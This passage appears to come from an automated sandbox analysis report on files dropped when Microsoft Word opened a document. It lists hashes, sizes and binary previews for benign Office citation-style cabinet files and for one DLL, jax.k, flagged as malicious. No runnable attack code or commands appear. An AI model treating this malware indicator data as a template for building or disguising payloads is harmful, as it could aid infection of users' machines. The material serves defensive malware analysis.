                        Preview:MSCF.....K......L............................K...?...................J.......@..............turabian.xsl."...............Content.inf._.......[...T.....C4.5...E0B.]...+.-f....rc.[52.$...a..I....{z...`hx.r...!.. $...l..\....#3EF..r..c;<p...&n.\b..K..0Y..c+.2...i..B..wwY..77,...........}.q.C.......n..,.....prrx.QHy.B#..,.'....3....%1.``..hf...~...[.[n.v.s..y.vw....;..s.G293G&H....$E......m.&^..iy/.4.C...D...".(H&..&.I4._...!...... ........q.k1.d.....qc.3.c.....;.5.......y}...}&...+.WAN.,zVY.Q....V.Tz........g..H..c...E2jY...4g?.yf<....V.M.s.$..k.Id....+..?..._.\.s.k..9..I%;.yWQ..S..]..*.n<.7........=......"Q.*E.....MG..j.Yt..!U....Q.j...v.h-.~b..e&.......;...\.....:.....=..Xv1&q........6\...xw.%*.VdS..H...o...s.....+..%[../>.t..I....F.....".G|.....=....[..S..3..a.C.ZZ...tK.6N..b........)>........I..m..QE.M.nv.MVl.....vCG>,.suP.gqo.rr....J`m....J.b..},[F*....e.A.]..r....C4.?JJs6..l.].9...Q.B.~.......\d%.X ...8A....rH....&?#...^.....4.h.{>

                        C:\Users\user\AppData\Local\Temp\cabAC59.tmp

                        Download File
                        Process:C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE
                        File Type:Microsoft Cabinet archive data, many, 30269 bytes, 2 files, at 0x4c "Text Sidebar (Annual Report Red and Black design).docx", iFolder 0x1 "Content.inf", 2 cffolders, flags 0x4, number 1, extra bytes 20 in head, 2 datablocks, 0x1203 compression
                        Category:dropped
                        Size (bytes):46413
                        Entropy (8bit):7.9071408623961394
                        Encrypted:false
                        SSDEEP:768:WaxA0CH65GY3+fvCXCttfR8JEBrkquwDn+QV5V+vNWBatX/xG8Pi65sMuMjvU+mQ:hne65GYOfKXMSEBrBtDnzFAI4JxP75sM
                        MD5:C455C4BC4BEC9E0DA67C4D1E53E46D5A
                        SHA1:7674600C387114B0F98EC925BE74E811FB25C325
                        SHA-256:40E9AF9284FF07FDB75C33A11A794F5333712BAA4A6CF82FA529FBAF5AD0FED0
                        SHA-512:08166F6CB3F140E4820F86918F59295CAD8B4A17240C206DCBA8B46088110BDF4E4ADBAB9F6380315AD4590CA7C8ECDC9AFAC6BD1935B17AFB411F325FE81720
                        Malicious:false
                        Preview:MSCF....=v......L...........................=v...?..................5u......................Text Sidebar (Annual Report Red and Black design).docx.v...............Content.inf..C,.zd..[............... .w.....b...wwww]r..W\ww...... .hh...........o.nz.....Ku.7..-.oH...h;.N..#.._.D,}......!Q$..Un.tI11..$w.r3... ..p...=.1....""..n...*/....h.A...Y..c,.Q.,......",..b.1.w..$.....l../;..J.....~.. ....+.R#....7.-..1.x.feH.@.......u...(.DQ%.wL.N|.xh...R..#....C...'X.m.....I{W.....5.C.....\....z.Y.)w..i...%....M..n.p.....{..-G9..k.bT.6........7....).....6..ys.....R.e.....0.Xk`.3..X\xL..4J"#.f...:....r..2..Y.uW..052.n.+ ..o..o..f&u.v.&9y.P..6.K..in.DU.#.~....4i..6;.5.w..i...g.(....../..0*Vh...C..//....W..:w......7.6....]....4.*9...sL.0k...zHh..2N.H...*..]..(.x.:..........Y.+...-.....&.*^..Q.sW...v..w.....k.L.e.^.W4iFS..u.....l.g'...b~:Zm...S.2.|......5S..=.............l.../|....G|.9 ..#.q...W.Q...G=.."W..'.6....I....D._.{.g.47....V.1._..<?....m............)..T.

                        C:\Users\user\AppData\Local\Temp\cabAC89.tmp

                        Download File
                        Process:C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE
                        File Type:Microsoft Cabinet archive data, many, 14864 bytes, 2 files, at 0x4c "mlaseventheditionofficeonline.xsl", iFolder 0x1 "Content.inf", 2 cffolders, flags 0x4, number 1, extra bytes 20 in head, 8 datablocks, 0x1203 compression
                        Category:dropped
                        Size (bytes):31008
                        Entropy (8bit):7.806058951525675
                        Encrypted:false
                        SSDEEP:768:ktH7oN/HbwiV+M+4Jc+5UrT3czi5uOHQA8Pi6DxUR/WTZIy:87sPEANXJc+eTMsuzP7DmN0ZIy
                        MD5:E033CCBC7BA787A2F824CE0952E57D44
                        SHA1:EEEA573BEA217878CD9E47D7EA94E56BDAFFE22A
                        SHA-256:D250EB1F93B43EFB7654B831B4183C9CAEC2D12D4EFEE8607FEE70B9FAB20730
                        SHA-512:B807B024B32E7F975AED408B77563A6B47865EECE32E8BA993502D9874B56580ECC9D9A3FEFA057FDD36FB8D519B6E184DB0593A65CC0ACF5E4ACCBEDE0F9417
                        Malicious:false
                        Preview:MSCF.....:......L............................:...?...................9......................mlaseventheditionofficeonline.xsl.L...............Content.inf.N.#.....[...>..9..3c.5...F.B.]Y.3..%d.8...v;....~Y.L.=..v..m.g...|K.B....$......s.......#CdE.p.p..@...j.Nl2'...L..N.G:-V:.d.....i..M........mK.w.....\W.<.`..b$.!..!3..rT.A..#.).;KZ...a.-..j&e`R.~7dIRS.I..f.ff....}.}....^[wo.uw..i.m7......v$.I..n....-.Z.M5...iH..Ea..., [..0.L...DH..." ..... .@...H.@..+...}.......*^..'.4*.tHa..f].gV..~.7V.....C..).(.U"..f.@l..j'..%\.u.UU.....9<13...5..=........./..Z..{..-.L].+Y.fL.<EJ.q..!.j....W..]E./.~Y>...GgQ..-....Q.C..5..T+...fO. .)..~.7..Y....+..U=.e..8w.m...._..S..v.d.* ......S3z.X)......u...t.......i.;.a...X.Ji....g.3.!.O.....T.f6..[U....O..Z.X.q.G....?.k]..?...8.u.;].8y.T.9D..!?R....:........3+.P.....7?m}..............1...y3.g.\c.ks^;?.f.U5...U.j....E.N.}.!.......).R1....~.....R.....3.J.f...l..E^:...&_..%..v...^..E...rC..O....M.#..<..H..bB.+.W..

                        C:\Users\user\AppData\Local\Temp\cabACBB.tmp

                        Download File
                        Process:C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE
                        File Type:Microsoft Cabinet archive data, many, 17466 bytes, 2 files, at 0x4c "chicago.xsl", iFolder 0x1 "Content.inf", 2 cffolders, flags 0x4, number 1, extra bytes 20 in head, 10 datablocks, 0x1203 compression
                        Category:dropped
                        Size (bytes):33610
                        Entropy (8bit):7.8340762758330476
                        Encrypted:false
                        SSDEEP:768:IlFYcxiahedKSDNAPk5WEEfA8Pi6xnOKMRA58:2JitdKsNAM5WBDP7xOKMq58
                        MD5:51804E255C573176039F4D5B55C12AB2
                        SHA1:A4822E5072B858A7CCA7DE948CAA7D2268F1BB4B
                        SHA-256:3C6F66790C543D4E9D8E0E6F476B1ACADF0A5FCDD561B8484D8DDDADFDF8134B
                        SHA-512:2AC8B1E433C9283377B725A03AE72374663FEC81ABBA4C049B80409819BB9613E135FCD640ED433701795BDF4D5822461D76A06859C4084E7BAE216D771BB091
                        Malicious:false
                        Preview:MSCF....:D......L...........................:D...?..................XC.....................chicago.xsl. ...............Content.inf.!..B...[...H."m..3C.6...WP!i/Z..vn._...^omvw+...^..L.4o...g..y......^..x...BH.B.K....w.....F........p ./gg.h.0I',.$..a.`.*...^..vi..mw..........K....oQ............P...#...3.......U(.=...q.~?..H..?.'I4'.......X...}w.vw.....f.n..f{3.....-....%dK&q..D.H.Z..h-..H.[$ %.."..e....1...$.............'.....B..%..4...&`S!DQ...M.......N~............S..'....M..4E.^..dej..i..+.`...6F%sJ....Q..d.(*.s.Z...U-5Eh.s.CK...K..X$......j..T.?.`.|...=..R...-7...*...TU.....7a...&I.noOK|.W.R-+S.d..rR.....{h.Y...)..xJ..=.XM..o...P'.I4m..~I..C..m.....f.....;{Mzg+Wm.~...z...r-.....eK...lj:^.1g5...7.h(T"..t?5......u.....G.Z<..sL.\{...8=t...Z...'tps.:...|....6.....S..X...I...6l.M.....aq.;YS....{:.&.'.&.F.l...\.[L.%.so\.v.Lo...zO.^^...p..*9k...).CC..F0>L...VUE4.......2..c..p.rCi..#...b.C@o.l.. E_b..{d...hX.\_!a#.E.....yS.H...aZ...~D3.pj: ss?.]....~

                        C:\Users\user\AppData\Local\Temp\cabACBD.tmp

                        Download File
                        Process:C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE
                        File Type:Microsoft Cabinet archive data, many, 14813 bytes, 2 files, at 0x4c "iso690nmerical.xsl", iFolder 0x1 "Content.inf", 2 cffolders, flags 0x4, number 1, extra bytes 20 in head, 7 datablocks, 0x1203 compression
                        Category:dropped
                        Size (bytes):30957
                        Entropy (8bit):7.808231503692675
                        Encrypted:false
                        SSDEEP:384:rKfgT03jNkAFbgUQWtxq9OGh1bBkd/1MVHb5iVOdMgbA8E0GftpBjEl8tFLrHRNF:r303jOrUQAkfhopWHbA8Pi6l8zuUIq
                        MD5:D3C9036E4E1159E832B1B4D2E9D42BF0
                        SHA1:966E04B7A8016D7FDAFE2C611957F6E946FAB1B9
                        SHA-256:434576EB1A16C2D14D666A33EDDE76717C896D79F45DF56742AFD90ACB9F21CE
                        SHA-512:D28D7F467F072985BCFCC6449AD16D528D531EB81912D4C3D956CF8936F96D474B18E7992B16D6834E9D2782470D193A17598CAB55A7F9EB0824BC3F069216B6
                        Malicious:false
                        Preview:MSCF.....9......L............................9...?...................8......1P..............iso690nmerical.xsl.................Content.inf...A@...[...5.....33.E...P.../..........5sv.]3srm8.T.=.......}.v.T.. ..4IH.r.%Z.(.q.\+K..[,....E....A......#CEF..}p..Y/s$...YKI.#M.?.t.1#C....I..v.vn...-...v7../S.m.Ma.....!.Y....4.......3.3....c&R9..%......(J..BDMI.>7J.....".....}.w.}w.wg.v...^.n.{....{f.mlI..%.#..I..S....D..QJ U......4........K.(@....DH.....}...8;..z...&0%e..G.OAM..x.3......\....zS9....}......89.B...e.W.p{;.....m.m3...}....../...q.~..;.,..".j.g..^N............iC.../|...g.=..9.Q].Gf.....QA....74..v.....9.n[......0.}..jo{y./.2..Ym......;u...b.(Jz^.....~..uM...{s../..#.)n2..S.S.c..6)U.V....!.'R.......P.S.D..S.p/......D.......{......?.u.",...Mp._....N..+..=Y#..&0w....r.......$.xwC......P.e7.>O....7....].y%q^S'....*.C.`.?..}Q..k../u.TK...y........S...{T.?......[.H.'L..AS.Y.|*..b...J.H-.^U>'9..uD[.".b[.l.......o..6.L).h.B0RJa.b..|m:.):......F

                        C:\Users\user\AppData\Local\Temp\cabACED.tmp

                        Download File
                        Process:C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE
                        File Type:Microsoft Cabinet archive data, many, 12767 bytes, 2 files, at 0x4c "ieee2006officeonline.xsl", iFolder 0x1 "Content.inf", 2 cffolders, flags 0x4, number 1, extra bytes 20 in head, 9 datablocks, 0x1203 compression
                        Category:dropped
                        Size (bytes):28911
                        Entropy (8bit):7.7784119983764715
                        Encrypted:false
                        SSDEEP:384:WnJY165YD0tPYoCKa3HueqRyzVscLk1Yj2GjcgbA8E0GftpBjE2kWTpjFLrHRN7N:X4rtPzCK6uRoljXBA8Pi62ZphL0HRA5p
                        MD5:6D787B1E223DB6B91B69238062CCA872
                        SHA1:A02F3D847D1F8973E854B89D4558413EA2E349F7
                        SHA-256:DA2F261C3C82E229A097A9302C8580F014BB6442825DB47C008DA097CFCE0EE4
                        SHA-512:9856D88D5C63CD6EBCF26E5D7521F194FA6B6E7BF55DD2E0238457A1B760EB8FB0D573A6E85E819BF8E5BE596537E99BC8C2DCE7EC6E2809A43490CACCD44169
                        Malicious:false
                        Preview:MSCF.....1......L............................1...?...................0......"}..............ieee2006officeonline.xsl.:...............Content.inf.........[...G."...3$pE...G B....m3o[...I2&.f.,\..........}.n..{..e.8!^.3.A@...x..... .D.52gU..]..."..N8....s..CS..J3..HV...m...y..o....F.z......V.j._....=~k.....'.dY........1........#...d13.g.&C...C.xw.`f.hf..........]M....m.m....ud...,+.H~..cL...e#;(RI...eA....I.b...E...2..(...$.j...L...$..A....'[...H9..&..G.Q....".M.yl....]..?j%+....O~.*....|.se...K\.B"W..F.5.......=s...l.Y...K..yN.TBH[...sTWR.N.d...WEa....T.d.K.^sauI......m..s=.,qso5.b.V.s.]..9..,k4.\..L.;D...........;r.C...7.w.j..:N8.V6..a.3..j:A.mA..To..$.5....:./..p.x.3.=..__...8.EB.K.*..].-."..5-XU..J.....=o..K.Wavg.o].z.9.gk.._.........MZ.<.5............OY.n.o...r.9v.c.......[n.[..D...d..}.j.....LB,]_.9..St.@..C....\...^....-&.njq..!P....G^.....w.7.p~.......M..g.J............t1......q.w.rx...qp.....E.........-...2..G.........z.]B........d....C.@...@.

                        C:\Users\user\AppData\Local\Temp\cabACEE.tmp

                        Download File
                        Process:C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE
                        File Type:Microsoft Cabinet archive data, many, 15338 bytes, 2 files, at 0x4c "gosttitle.xsl", iFolder 0x1 "Content.inf", 2 cffolders, flags 0x4, number 1, extra bytes 20 in head, 8 datablocks, 0x1203 compression
                        Category:dropped
                        Size (bytes):31482
                        Entropy (8bit):7.808057272318224
                        Encrypted:false
                        SSDEEP:768:LgHv7aLOcoLGQ4EykdrHwLa+A8Pi6Iv8ACIa:LwvWyx4EykdTwLaWP7I0ACIa
                        MD5:F10DF902980F1D5BEEA96B2C668408A7
                        SHA1:92D341581B9E24284B7C29E5623F8028DBBAAFE9
                        SHA-256:E0100320A4F63E07C77138A89EA24A1CBD69784A89FE3BF83E35576114B4CE02
                        SHA-512:00A8FBCD17D791289AC8F12DC3C404B0AFD240278492DF74D2C5F37609B11D91A26D737BE95D3FE01CDBC25EEDC6DA0C2D63A2CCC4AB208D6E054014083365FB
                        Malicious:false
                        Preview:MSCF.....;......L............................;...?...................;......................gosttitle.xsl.$...............Content.inf....v....[...=..Ic.32.E...`o.............m....4uk[.,.......{...}k{.R@(Hq..68nv...@.D.....$...j....8Q..........8.8........3...*.bi?Wt...:(..J.;&eii..io.w..z...`.'..i.MLR@.>....N..3`P.>$X@(r.#.D..(....P"_..I.$o.. L!y...I...H.........{.{....{.3....7..w..{w.2sn.dYn.lW...l...c$.UH....L6. .D$$...!F.!... .D............_..'.`.Q.v>..Z..f.n.l....0o.......bK...?s..eO....'.>t......S'..........~....h...v&7:q.x9|qs...%....:..D...ag.....e..'...".A.Y..?w"....p1t.9J.~.4.........~vj.n.8.;.O......../.}..io{p...e...\m.d`.gAm.......1"...N*...8..g"......~..[.e+.....\6i4.....%...Rq.U-p?..4P..4.f.?N.vI?.M\i.;.s..E.L.hu.*...\..5....N......]......\`...rS.\g.....2..!a).?.l.!i.^.t.u...x...g/.A..v.E...\.@.>kM...&.g.....%.......{.....2..E.g...'..[w...N.w..& 4M.a.cu.%:...\.D..Q..C.'fm..i....@._......QI.. ....h..|fB.il.(`..h.d;.l...`.s:

                        C:\Users\user\AppData\Local\Temp\cabACEF.tmp

                        Download File
                        Process:C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE
                        File Type:Microsoft Cabinet archive data, many, 16689 bytes, 2 files, at 0x4c "iso690.xsl", iFolder 0x1 "Content.inf", 2 cffolders, flags 0x4, number 1, extra bytes 20 in head, 9 datablocks, 0x1203 compression
                        Category:dropped
                        Size (bytes):32833
                        Entropy (8bit):7.825460303519308
                        Encrypted:false
                        SSDEEP:768:+0TU06CkaUYMoi//YX428RaFA8Pi6e9iA4I3w:vICTm/QorUpP7eAA4I3w
                        MD5:205AF51604EF96EF1E8E60212541F742
                        SHA1:D436FE689F8EF51FBA898454CF509DDB049C1545
                        SHA-256:DF3FFF163924D08517B41455F2D06788BA4E49C68337D15ECF329BE48CF7DA2D
                        SHA-512:BCBA80ED0E36F7ABC1AEF19E6FF6EB654B9E91268E79CA8F421CB8ADD6C2B0268AD6C45E6CC06652F59235084ECDA3BA2851A38E6BCD1A0387EB3420C6EC94AC
                        Malicious:false
                        Preview:MSCF....1A......L...........................1A...?..................S@......v...............iso690.xsl.................Content.inf.B.9.....[...A.c...32.E...P..'.^}.f...ikMJ....m..s..U.w{m{{...}n.4........I. ..9..d..I.......P|....F...F.......&&J.:I.34......+*M3..4mr.........m.r..m)....dK.wiw...H,...r........y.$..Cu...L...dH.../..V......g.PG$R39...4O..............{w..^....c.m.m.o.....#..Fgs..6.....b....3.I..O....B..B..1h"....K|f .41......_..g.N.<.>........(....o3a.M)....J..}....-......8.......g.hm!r<...-..1.1....q.?....S.m...`L.g#.K.igv.].ghD....L...p5..?.......iP.[JS.J..?z~.T/.Q...E.K.......P+\LW.-.c..[9.n.7.....P...*[.A1....m...4h.9...N[....h5 n%k.~RR.*c..n..=...4....).eH.-./..>....*.r..S.*..dE.........pF..s.A..?...f..u.+.{..?>N.4].}Xb.M......y......'.2..'..........J4{r..r.3........5>..a0.>.u_.y@g....+y.yu--,ZdD.........5]3..'.s...|.....K.....T..G.G.e...)..\x..OM.g...`..j0......BfH...+.....:......l`.qU...;.@...",.."........>;P.B.^F...3!......Rx.9..

                        C:\Users\user\AppData\Local\Temp\cabACF0.tmp

                        Download File
                        Process:C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE
                        File Type:Microsoft Cabinet archive data, many, 18672 bytes, 2 files, at 0x4c "APASixthEditionOfficeOnline.xsl", iFolder 0x1 "Content.inf", 2 cffolders, flags 0x4, number 1, extra bytes 20 in head, 11 datablocks, 0x1203 compression
                        Category:dropped
                        Size (bytes):34816
                        Entropy (8bit):7.840826397575377
                        Encrypted:false
                        SSDEEP:768:i3R9VYnIYfPYmqX0CnF1SRHVnLG8Pi61YbEIFO:ih9VjYfPYlk+F1SJxP71YbEIFO
                        MD5:62863124CDCDA135ECC0E722782CB888
                        SHA1:2543B8A9D3B2304BB73D2ADBEC60DB040B732055
                        SHA-256:23CCFB7206A8F77A13080998EC6EF95B59B3C3E12B72B2D2AD4E53B0B26BB8C3
                        SHA-512:2734D1119DC14B7DFB417F217867EF8CE8E73D69C332587278C0896B91247A40C289426A1A53F1796CCB42190001273D35525FCEA8BA2932A69A581972A1EF00
                        Malicious:false
                        Preview:MSCF.....H......L............................H...?...................G......................APASixthEditionOfficeOnline.xsl.H...............Content.inf..h;.....[...Q..\..3S.5..oVP!i/Z.Ls...]q$...xY..+W.qm..B..y/.5.s..x$../K./.x.$.....}.......\........LNf..Hd.&."Ip.L.Mr-@.D..kW~i...^.....F.....T.U....../..0..2.{.q.T.`'{.00.{.B...>.R..2....1.~_.f..s...........~....~[..v..w..v....$[K.r$#[6...d;[...#.9.-...G..Z..eAR.0")%JI?&....$..$.H..$(........f.> k....hP...p...!j.T......l7..../3..(2^V...#..T9...3.@[0...le:...........E....YP.\.....au1...\.S|..-.duN.Z..g.O......X8....1.....|,.f/..w.|Wk]zJz.g'./7h..+.....}............x....s.2Z\..W.{...O....W.{j.U..Q....uO=.p.M k.E.S{SUd.@....S.Syo8>......r......8..............Z?>.mUAg....?o....f.7..W.n...P..........d.S?...\..W`...c.ua..........#.Y...45...F(d.o\09^..[.}...BsT.SD..[l.8..uw.7l..S.9T.KR..o......V..]...M .....t.r...:P...M....4.F.....@..t.1t..S...k.2.|5...i.%H..<.J..*.0n.....lZ.....?.*?.~..O .)..

                        C:\Users\user\AppData\Local\Temp\cabAD5E.tmp

                        Download File
                        Process:C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE
                        File Type:Microsoft Cabinet archive data, many, 15418 bytes, 2 files, at 0x4c "harvardanglia2008officeonline.xsl", iFolder 0x1 "Content.inf", 2 cffolders, flags 0x4, number 1, extra bytes 20 in head, 9 datablocks, 0x1203 compression
                        Category:dropped
                        Size (bytes):31562
                        Entropy (8bit):7.81640835713744
                        Encrypted:false
                        SSDEEP:384:yhsBScEWkrljntbzuMmWh7ezPnGgbA8E0GftpBjohgsRFLrHRN7ybll7PK/p:MsBScwtnBmWNeTzA8PiuWsvyDI
                        MD5:1D6F8E73A0662A48D332090A4C8C898F
                        SHA1:CF9AD4F157772F5EDC0FDDEEFD9B05958B67549C
                        SHA-256:8077C92C66D15D7E03FBFF3A48BD9576B80F698A36A44316EABA81EE8043B673
                        SHA-512:5C03A99ECD747FBC7A15F082DF08C0D26383DB781E1F70771D4970E354A962294CE11BE53BECAAD6746AB127C5B194A93B7E1B139C12E6E45423B3A509D771FC
                        Malicious:false
                        Preview:MSCF....:<......L...........................:<...?..................D;.......V..............harvardanglia2008officeonline.xsl.L...............Content.inf.Vu......[...E..o..3D.5..nF.A..+.e.....6r..f........M3...-.s.m.... $r.b.!.q!.....G...0.\.......fd......%m...'1Y..f..O...*.#.P.,{..m...|..ww.{.m...f...n%...,..y...0y...8.Q...`.../.q....a...',.V......8.7..8t..................6.]..6..nw..ynm..-l.Y..,.I?..$....+b9$E!S@"..) .4........H...lA...@!a.F.l$..0#!.....n&.5j.t+..1f|.+....E.zDk.l8.+<q.^.........\5.l..iT.9...........Y..6.^,.o.bn.E*5w..s.../...W.gS..j9..'W.F......].4\Mzz..Td..Ho..~.Q...Z..D..O.JP..m..s.j.:..........y._.....#.*.rD....60.\!y........p.o3,..Ub,......[[L.{.5.....5.7UDB9.{;;g.z.z..jM.G.MY.oe.....(r..B6..CV.7Fl.Z/....-.O.vY.c...-..........b.T)3.u..f~x2.?.8.g.x.-.....Qt_...$e.l..jtP..b....h..*.sW0.`.....c...F_....t.........LC..*5I.X$^.;&....#.._\J..........;..wP..wX.qy.qs...}46..fK.XN.&0........k1....8...............'t.......}.......O_.

                        C:\Users\user\AppData\Local\Temp\{9C081570-F32B-46C7-9B47-B1E0B2DF993E}\jax.k

                        Download File
                        Process:C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE
                        File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                        Category:dropped
                        Size (bytes):720896
                        Entropy (8bit):6.648944468588579
                        Encrypted:false
                        SSDEEP:12288:uC69N9C/hMHx8kzFfagPtKEp6E72y/N0hwOGt+gBd8x+6vLrD1ag:HKHaY8k5faaboEy6r8zz1
                        MD5:9DC6F214FC82D637DE2F68F3C519D339
                        SHA1:AAA425F7377D405BEA59B8ADFB65AFC0C8869886
                        SHA-256:2A8B737A4752060A308C4312B7C0CF6C05CDE5B370906286DEA9CDD36F5AA613
                        SHA-512:5CB0A6F3AB48E5127D5C9F638C035DD4B3A97F3EB31334D5BC3EEAFC164B31540FEA65D6E40ABFAC8566676C43E954F567DBC2AF81A629B4059AF7E466D75BEF
                        Malicious:true
                        Antivirus:
                        • Antivirus: ReversingLabs, Detection: 77%
                        Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*............................H#.......0....@..........................@...............................................`..J$...@..............................................................................................................CODE....h........................... ..`DATA.........0......................@...BSS.....%....P.......0...................idata..J$...`...&...0..............@....reloc...............V..............@..P.rsrc........@......................@..P.............@......................@..P........................................................................................................................................................................................................................

                        C:\Users\user\AppData\Local\Temp\{9C081570-F32B-46C7-9B47-B1E0B2DF993E}\jax.k:Zone.Identifier

                        Download File
                        Process:C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE
                        File Type:ASCII text, with CRLF line terminators
                        Category:dropped
                        Size (bytes):26
                        Entropy (8bit):3.95006375643621
                        Encrypted:false
                        SSDEEP:3:gAWY3n:qY3n
                        MD5:FBCCF14D504B7B2DBCB5A5BDA75BD93B
                        SHA1:D59FC84CDD5217C6CF74785703655F78DA6B582B
                        SHA-256:EACD09517CE90D34BA562171D15AC40D302F0E691B439F91BE1B6406E25F5913
                        SHA-512:AA1D2B1EA3C9DE3CCADB319D4E3E3276A2F27DD1A5244FE72DE2B6F94083DDDC762480482C5C2E53F803CD9E3973DDEFC68966F974E124307B5043E654443B98
                        Malicious:false
                        Preview:[ZoneTransfer]..ZoneId=3..

                        C:\Users\user\AppData\Local\Temp\~DF226FFEA586065DC3.TMP

                        Download File
                        Process:C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE
                        File Type:data
                        Category:dropped
                        Size (bytes):512
                        Entropy (8bit):0.0
                        Encrypted:false
                        SSDEEP:3::
                        MD5:BF619EAC0CDF3F68D496EA9344137E8B
                        SHA1:5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
                        SHA-256:076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
                        SHA-512:DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
                        Malicious:false
                        Preview:................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                        C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\0524_4109399728218.LNK

                        Download File
                        Process:C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE
                        File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Wed Dec 21 09:39:48 2022, mtime=Wed Apr 26 09:38:59 2023, atime=Wed Apr 26 09:38:57 2023, length=1335808, window=hide
                        Category:dropped
                        Size (bytes):554
                        Entropy (8bit):4.726239534145845
                        Encrypted:false
                        SSDEEP:6:4xtQl3Zf9nZyZlcWxf8eYKKTKtSs0ljsljAlCYeSRR6QNcdnWkSsNSt4WTeHvGm2:8q9ccG8eZK2tSs0OjAB8Qqt/SsjOm2
                        MD5:07B91F9AB086D369710C8D30BC4F0194
                        SHA1:6AB2EDD5B2D7F144349FDA1D3CDA0240CC7D1994
                        SHA-256:7FE18AD5CE1723B06CA61449E6DA821F6D401AFEB8822FBA15AFD06A8B576E42
                        SHA-512:87238ABE74A61DC60AC898FC88E435F68969DE09B8F0BB53D518FE6C4104207B486EDAA90DA5C446AC27B9C5B002EEABB0CB66F62D8EC7B46F1A86E3BC9D2F79
                        Malicious:false
                        Preview:L..................F.... ....)m.(.....yO+x..J..N+x...b......................|.z.2..b...V.T .0524_4~1.DOC..^......U.T.V.T.....a......................u.0.5.2.4._.4.1.0.9.3.9.9.7.2.8.2.1.8...d.o.c.......[...............-.......Z...........;S.......C:\Users\user\Desktop\0524_4109399728218.doc..-.....\.....\.....\.....\.....\.D.e.s.k.t.o.p.\.0.5.2.4._.4.1.0.9.3.9.9.7.2.8.2.1.8...d.o.c.`.......X.......965543..........N...n..O...}R...)oS.............N...n..O...}R...)oS.............E.......9...1SPS..mD..pH.H@..=x.....h....H....F.5./EG.gM.U..............

                        C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\index.dat

                        Download File
                        Process:C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE
                        File Type:Generic INItialization configuration [doc]
                        Category:dropped
                        Size (bytes):87
                        Entropy (8bit):4.759959123148596
                        Encrypted:false
                        SSDEEP:3:bDuMJlHRUXk+nzCmX1VS6RUXk+nzCv:bCwN0m6N0I
                        MD5:5AC6F8EBDB7ECEF9C42F1864228BBBF6
                        SHA1:AC4F7FB5B560B4B353D3F278C31045406026CBED
                        SHA-256:2234E04482CDF8404F30044193B6E41D04B6CAC61491243D8C09B2931932F579
                        SHA-512:C12ACA40CE733B6A194DA61CC8498F51EC9B2851F316CFF304DC1BD120BC363298DBE2A6F2FFAEC359BC8216B4A7808FF82E0C633E798AAA40A975D05248BFA9
                        Malicious:false
                        Preview:[folders]..Templates.LNK=0..0524_4109399728218.LNK=0..[doc]..0524_4109399728218.LNK=0..

                        C:\Users\user\AppData\Roaming\Microsoft\Templates\~$Normal.dotm

                        Download File
                        Process:C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE
                        File Type:data
                        Category:dropped
                        Size (bytes):162
                        Entropy (8bit):2.8648381951210884
                        Encrypted:false
                        SSDEEP:3:El//ePXln3/t/p1XlPlv//las9/ep//Xn:Et2pFH//laaeR/Xn
                        MD5:F10CD438C28AF029EDD0E98E50A9F47C
                        SHA1:28AEFDB9B72D7130CDC12F27907FE460A6D8AC01
                        SHA-256:281E44D55F3BA6200BB93DAC6AE5A8BDA8D2FD4C72D731F75D89C87765872854
                        SHA-512:B343DE68FD7D1792D2593F272E17DBC2ADE03C322D7627A5604926272266984045D92460581E377069ED1E580A317653EB3D45362A66C76F76E0FBBF3BF74705
                        Malicious:false
                        Preview:.user...................................................e.y.u.p...............................+4......................?K......K.)..S..|s.5...O.,O+x..........n...

                        C:\Users\user\AppData\Roaming\Microsoft\UProof\CUSTOM.DIC

                        Download File
                        Process:C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE
                        File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                        Category:dropped
                        Size (bytes):14
                        Entropy (8bit):2.699513850319966
                        Encrypted:false
                        SSDEEP:3:QARG:QAc
                        MD5:09B7FD4F63059FB967C6CF0D36AF99A4
                        SHA1:BDFABECF4B7BB2A0A08C69150C770C45C5A81303
                        SHA-256:AF2F74E5947D19590946BA404ED7FBEBF59A85BBF83354E24015FA9729A2808C
                        SHA-512:AEAC2A4520FD462248176C30E094269F6A285E1ADF731912E62E24B88EA792E2E42E92498FA944F677AC84758C41DFEA044216A96F6FD204E8CEC82E42351B4E
                        Malicious:false
                        Preview:..e.y.u.p.....

                        C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\0H7DA2S29TY2WHKR8GHC.temp

                        Download File
                        Process:C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE
                        File Type:data
                        Category:dropped
                        Size (bytes):12
                        Entropy (8bit):0.41381685030363374
                        Encrypted:false
                        SSDEEP:3:/l:
                        MD5:E4A1661C2C886EBB688DEC494532431C
                        SHA1:A2AE2A7DB83B33DC95396607258F553114C9183C
                        SHA-256:B76875C50EF704DBBF7F02C982445971D1BBD61AEBE2E4B28DDC58A1D66317D5
                        SHA-512:EFDCB76FB40482BC94E37EAE3701E844BF22C7D74D53AEF93AC7B6AE1C1094BA2F853875D2C66A49A7075EA8C69F5A348B786D6EE0FA711669279D04ADAAC22C
                        Malicious:false
                        Preview:............

